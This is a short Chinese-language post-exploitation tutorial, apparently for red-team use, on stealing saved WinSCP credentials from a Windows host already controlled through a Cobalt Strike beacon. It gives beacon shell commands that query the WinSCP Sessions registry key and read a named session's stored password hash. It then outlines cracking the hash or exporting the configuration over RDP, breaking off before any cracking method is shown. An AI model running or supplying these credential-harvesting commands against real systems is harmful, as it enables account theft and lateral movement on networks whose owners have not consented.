WinSCP是在Windows上使用SFTP进行文件传输的工具。可以找到用户在上面保存密码hash进行解密,获得密码。
直接从官网下载最新版:winscp.net/download/Wi…
假设目标已经上线CS:
确认安装了程序
确定存储位置
默认情况下,Winscp配置会存储在Windows对应的注册表项下(包括连接的IP、用户名、密码Hash)。
HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\
步骤
查看注册表里的会话信息:
beacon> shell reg query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions"
获取到存在的会话后,读存储的密码hash:
beacon> shell reg query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\rebootORZ@172.16.81.134"
破解hash
如果说单个的话,直接将hash拷贝下就行:
如果说比较多的,可以RDP直接连上去导出配置文件,再到本地解:
